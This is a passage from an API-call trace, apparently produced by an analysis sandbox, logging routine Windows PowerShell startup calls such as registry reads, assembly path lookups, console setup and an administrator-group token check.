puLen=0xcdaf0) returned 0 [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdac8, puLen=0xcdac0 | out: lplpBuffer=0xcdac8*=0x2bec2b4, puLen=0xcdac0) returned 1 [0131.083] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0131.083] VerLanguageNameW (in: wLang=0x0, szLang=0x14d180, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0131.083] CoTaskMemFree (pv=0x14d180) [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\", lplpBuffer=0xcdb18, puLen=0xcdb10 | out: lplpBuffer=0xcdb18*=0x2bec240, puLen=0xcdb10) returned 1 [0131.092] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.092] CoTaskMemFree (pv=0x10c990) [0131.097] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.097] CoTaskMemFree (pv=0x10c990) [0131.102] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9e8 | out: phkResult=0xcd9e8*=0x304) returned 0x0 [0131.104] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9d8 | out: phkResult=0xcd9d8*=0x308) returned 0x0 [0131.104] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcda68 | out: phkResult=0xcda68*=0x30c) returned 0x0 [0131.108] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd9ac, lpData=0x0, lpcbData=0xcd9a8*=0x0 | out: lpType=0xcd9ac*=0x1, lpData=0x0, lpcbData=0xcd9a8*=0x56) returned 0x0 [0131.109] CoTaskMemAlloc (cb=0x5a) returned 0x19b640 [0131.109] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd97c, lpData=0x19b640, lpcbData=0xcd978*=0x56 | out: lpType=0xcd97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd978*=0x56) returned 0x0 [0131.109] CoTaskMemFree (pv=0x19b640) [0131.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.148] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.149] CoTaskMemFree (pv=0x10c990) [0131.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.441] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.441] CoTaskMemFree (pv=0x10caa0) [0131.442] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.442] CoTaskMemFree (pv=0x10caa0) [0131.479] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.480] CoTaskMemFree (pv=0x10caa0) [0131.481] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.481] CoTaskMemFree (pv=0x10caa0) [0131.481] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.481] CoTaskMemFree (pv=0x10caa0) [0131.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0131.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0131.664] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.664] CoTaskMemFree (pv=0x10caa0) [0131.670] CoTaskMemAlloc (cb=0x104) returned 0x10caa0 [0131.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10caa0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.670] CoTaskMemFree (pv=0x10caa0) [0131.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0132.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0132.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0132.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0132.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0132.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0132.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0132.855] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0132.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0132.855] CoTaskMemFree (pv=0x10ccc0) [0132.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0132.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xcd6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0132.946] SetErrorMode (uMode=0x1) returned 0x1 [0132.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd940 | out: lpFileInformation=0xcd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0132.946] SetErrorMode (uMode=0x1) returned 0x1 [0133.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.127] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.127] CoTaskMemFree (pv=0x10ccc0) [0133.132] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.132] CoTaskMemFree (pv=0x10ccc0) [0133.133] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.133] CoTaskMemFree (pv=0x10ccc0) [0133.137] CoCreateGuid (in: pguid=0xcdd08 | out: pguid=0xcdd08*(Data1=0x89425a6c, Data2=0x7f29, Data3=0x4633, Data4=([0]=0xbe, [1]=0xf5, [2]=0x49, [3]=0xe8, [4]=0x10, [5]=0xf8, [6]=0x84, [7]=0x53))) returned 0x0 [0133.144] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.145] CoTaskMemFree (pv=0x10ccc0) [0133.148] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.148] CoTaskMemFree (pv=0x10ccc0) [0133.151] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0133.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0133.151] CoTaskMemFree (pv=0x10ccc0) [0133.158] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0133.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd9b0 | out: lpConsoleScreenBufferInfo=0xcd9b0) returned 1 [0133.166] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0133.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd9b0 | out: lpConsoleScreenBufferInfo=0xcd9b0) returned 1 [0133.167] GetVersionExW (in: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0133.170] GetCurrentProcess () returned 0xffffffffffffffff [0133.171] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd9d8 | out: TokenHandle=0xcd9d8*=0x320) returned 1 [0133.176] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd8f8 | out: TokenInformation=0x0, ReturnLength=0xcd8f8) returned 0 [0133.177] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x11b2c0 [0133.177] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x11b2c0, TokenInformationLength=0x4, ReturnLength=0xcd8f8 | out: TokenInformation=0x11b2c0, ReturnLength=0xcd8f8) returned 1 [0133.179] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcda58 | out: phNewToken=0xcda58*=0x31c) returned 1 [0133.179] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd8f8 | out: TokenInformation=0x0, ReturnLength=0xcd8f8) returned 0 [0133.179] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x11b2e0, TokenInformationLength=0x4, ReturnLength=0xcd8f8 | out: TokenInformation=0x11b2e0, ReturnLength=0xcd8f8) returned 1 [0133.180] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2cc6fc0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcda68 | out: IsMember=0xcda68) returned 1 [0133.180] CloseHandle (hObject=0x31c) returned 1 [0133.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.231] GetFullPathNameW (in: 